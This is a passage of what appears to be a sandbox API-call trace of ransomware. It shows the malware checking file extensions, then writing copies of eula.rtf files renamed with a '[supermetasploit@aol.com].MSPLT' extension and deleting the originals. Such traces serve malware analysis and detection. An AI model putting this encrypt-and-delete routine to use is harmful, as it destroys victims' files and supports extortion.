liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.752] SetEndOfFile (hFile=0x2f8) returned 1 [0169.753] CloseHandle (hObject=0x2f8) returned 1 [0169.753] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.754] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 1 [0169.754] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.754] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.754] lstrlenW (lpString=".doc") returned 4 [0169.754] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.754] lstrlenW (lpString=".docx") returned 5 [0169.754] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.754] lstrlenW (lpString=".pdf") returned 4 [0169.754] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.754] lstrlenW (lpString=".xls") returned 4 [0169.754] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.754] lstrlenW (lpString=".xlsx") returned 5 [0169.754] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.754] lstrlenW (lpString=".ppt") returned 4 [0169.754] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.754] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.754] lstrlenW (lpString=".zip") returned 4 [0169.754] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.755] lstrlenW (lpString=".rar") returned 4 [0169.755] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString=".bz2") returned 4 [0169.755] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString=".7z") returned 3 [0169.755] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString=".dbf") returned 4 [0169.755] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString=".1cd") returned 4 [0169.755] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString=".jpg") returned 4 [0169.755] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString=".doc") returned 4 [0169.755] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString=".docx") returned 5 [0169.755] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.755] lstrlenW (lpString=".pdf") returned 4 [0169.755] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString=".xls") returned 4 [0169.755] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.755] lstrlenW (lpString=".xlsx") returned 5 [0169.755] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.755] lstrlenW (lpString=".ppt") returned 4 [0169.755] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.755] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.755] lstrlenW (lpString=".zip") returned 4 [0169.755] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.756] lstrlenW (lpString=".rar") returned 4 [0169.756] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.756] lstrlenW (lpString=".bz2") returned 4 [0169.756] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.756] lstrlenW (lpString=".7z") returned 3 [0169.756] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.756] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.756] lstrlenW (lpString=".dbf") returned 4 [0169.756] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.756] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.756] lstrlenW (lpString=".1cd") returned 4 [0169.756] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.756] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0169.756] lstrlenW (lpString=".jpg") returned 4 [0169.756] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.756] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.756] lstrlenW (lpString="eula.rtf") returned 8 [0169.756] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.756] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3526) returned 1 [0169.756] CloseHandle (hObject=0x2f8) returned 1 [0169.757] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 0x80 [0169.757] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.757] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.757] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.757] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.757] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.759] GetLastError () returned 0x0 [0169.759] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xdc6, lpOverlapped=0x0) returned 1 [0169.802] WriteFile (in: hFile=0x300, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xdd0, lpOverlapped=0x0) returned 1 [0169.804] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0169.804] WriteFile (in: hFile=0x300, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.804] SetEndOfFile (hFile=0x300) returned 1 [0169.804] CloseHandle (hObject=0x300) returned 1 [0169.809] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.809] SetEndOfFile (hFile=0x2f8) returned 1 [0169.810] CloseHandle (hObject=0x2f8) returned 1 [0169.810] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.810] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 1 [0169.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.811] lstrlenW (lpString=".doc") returned 4 [0169.811] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.811] lstrlenW (lpString=".docx") returned 5 [0169.811] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.811] lstrlenW (lpString=".pdf") returned 4 [0169.811] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.811] lstrlenW (lpString=".xls") returned 4 [0169.811] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.811] lstrlenW (lpString=".xlsx") returned 5 [0169.811] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.811] lstrlenW (lpString=".ppt") returned 4 [0169.811] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.811] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.811] lstrlenW (lpString=".zip") returned 4 [0169.811] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.811] lstrlenW (lpString=".rar") returned 4 [0169.811] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.811] lstrlenW (lpString=".bz2") returned 4 [0169.811] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString=".7z") returned 3 [0169.812] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.812] lstrlenW (lpString=".dbf") returned 4 [0169.812] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.812] lstrlenW (lpString=".1cd") returned 4 [0169.812] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.812] lstrlenW (lpString=".jpg") returned 4 [0169.812] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.812] lstrlenW (lpString=".doc") returned 4 [0169.812] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString=".docx") returned 5 [0169.812] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0169.812] lstrlenW (lpString=".pdf") returned 4 [0169.812] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString=".xls") returned 4 [0169.812] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0169.812] lstrlenW (lpString=".xlsx") returned 5 [0169.812] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0169.812] lstrlenW (lpString=".ppt") returned 4 [0169.812] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.812] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.813] lstrlenW (lpString=".zip") returned 4 [0169.813] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0169.813] lstrlenW (lpString=".rar") returned 4 [0169.813] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.813] lstrlenW (lpString=".bz2") returned 4 [0169.813] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0169.813] lstrlenW (lpString=".7z") returned 3 [0169.813] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0169.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.813] lstrlenW (lpString=".dbf") returned 4 [0169.813] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0169.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.813] lstrlenW (lpString=".1cd") returned 4 [0169.813] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0169.813] lstrlenW (lpString="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned 35 [0169.813] lstrlenW (lpString=".jpg") returned 4 [0169.813] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0169.813] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0169.813] lstrlenW (lpString="eula.rtf") returned 8 [0169.813] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.814] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=6851) returned 1 [0169.814] CloseHandle (hObject=0x2f8) returned 1 [0169.814] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 0x80 [0169.814] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.814] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0169.814] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.814] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.815] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0169.827] GetLastError () returned 0x0 [0169.827] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x1ac3, lpOverlapped=0x0) returned 1 [0169.855] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0x1ad0, lpOverlapped=0x0) returned 1 [0169.857] ReadFile (in: hFile=0x2f8, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0169.857] WriteFile (in: hFile=0x2e8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0169.857] SetEndOfFile (hFile=0x2e8) returned 1 [0169.857] CloseHandle (hObject=0x2e8) returned 1 [0169.865] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0169.865] SetEndOfFile (hFile=0x2f8) returned 1 [0169.866] CloseHandle (hObject=0x2f8) returned 1 [0169.866] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.866] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 1 [0170.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.247] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.247] lstrlenW (lpString=".doc") returned 4 [0170.247] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.247] lstrlenW (lpString=".docx") returned 5 [0170.247] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.247] lstrlenW (lpString=".pdf") returned 4 [0170.248] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString=".xls") returned 4 [0170.248] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.248] lstrlenW (lpString=".xlsx") returned 5 [0170.248] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.248] lstrlenW (lpString=".ppt") returned 4 [0170.248] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString=".zip") returned 4 [0170.248] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.248] lstrlenW (lpString=".rar") returned 4 [0170.248] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString=".bz2") returned 4 [0170.248] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString=".7z") returned 3 [0170.248] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString=".dbf") returned 4 [0170.248] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString=".1cd") returned 4 [0170.248] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString=".jpg") returned 4 [0170.248] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.248] lstrlenW (lpString=".doc") returned 4 [0170.248] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.248] lstrlenW (lpString=".docx") returned 5 [0170.248] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.248] lstrlenW (lpString=".pdf") returned 4 [0170.248] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString=".xls") returned 4 [0170.249] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.249] lstrlenW (lpString=".xlsx") returned 5 [0170.249] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.249] lstrlenW (lpString=".ppt") returned 4 [0170.249] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.249] lstrlenW (lpString=".zip") returned 4 [0170.249] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.249] lstrlenW (lpString=".rar") returned 4 [0170.249] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString=".bz2") returned 4 [0170.249] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString=".7z") returned 3 [0170.249] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.249] lstrlenW (lpString=".dbf") returned 4 [0170.249] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.249] lstrlenW (lpString=".1cd") returned 4 [0170.249] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.249] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0170.249] lstrlenW (lpString=".jpg") returned 4 [0170.249] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.249] lstrcmpiW (lpString1=".rtf", lpString2=".MSPLT") returned 1 [0170.249] lstrlenW (lpString="eula.rtf") returned 8 [0170.249] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.480] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x29aff14 | out: lpFileSize=0x29aff14*=3643) returned 1 [0170.480] CloseHandle (hObject=0x30c) returned 1 [0170.480] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 0x80 [0170.480] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0170.480] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0170.480] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.481] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.481] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0170.483] GetLastError () returned 0x0 [0170.483] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0xe3b, lpOverlapped=0x0) returned 1 [0170.522] WriteFile (in: hFile=0x2f8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe40, lpOverlapped=0x0) returned 1 [0170.523] ReadFile (in: hFile=0x30c, lpBuffer=0x2eb8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x29afecc, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesRead=0x29afecc*=0x0, lpOverlapped=0x0) returned 1 [0170.523] WriteFile (in: hFile=0x2f8, lpBuffer=0x2eb8020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x29afc94, lpOverlapped=0x0 | out: lpBuffer=0x2eb8020*, lpNumberOfBytesWritten=0x29afc94*=0xe4, lpOverlapped=0x0) returned 1 [0170.523] SetEndOfFile (hFile=0x2f8) returned 1 [0170.523] CloseHandle (hObject=0x2f8) returned 1 [0170.528] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x29afec0 | out: lpNewFilePointer=0x0) returned 1 [0170.528] SetEndOfFile (hFile=0x30c) returned 1 [0170.529] CloseHandle (hObject=0x30c) returned 1 [0170.529] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0170.530] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 1 [0170.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.530] lstrlenW (lpString=".doc") returned 4 [0170.530] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0170.530] lstrlenW (lpString=".docx") returned 5 [0170.530] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0170.530] lstrlenW (lpString=".pdf") returned 4 [0170.530] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0170.530] lstrlenW (lpString=".xls") returned 4 [0170.530] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0170.530] lstrlenW (lpString=".xlsx") returned 5 [0170.530] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0170.530] lstrlenW (lpString=".ppt") returned 4 [0170.530] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0170.530] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.530] lstrlenW (lpString=".zip") returned 4 [0170.530] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0170.530] lstrlenW (lpString=".rar") returned 4 [0170.530] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0170.530] lstrlenW (lpString=".bz2") returned 4 [0170.531] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString=".7z") returned 3 [0170.531] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0170.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW (lpString=".dbf") returned 4 [0170.531] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW (lpString=".1cd") returned 4 [0170.531] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW (lpString=".jpg") returned 4 [0170.531] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0170.531] lstrlenW (lpString="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 35 [0170.531] lstrlenW 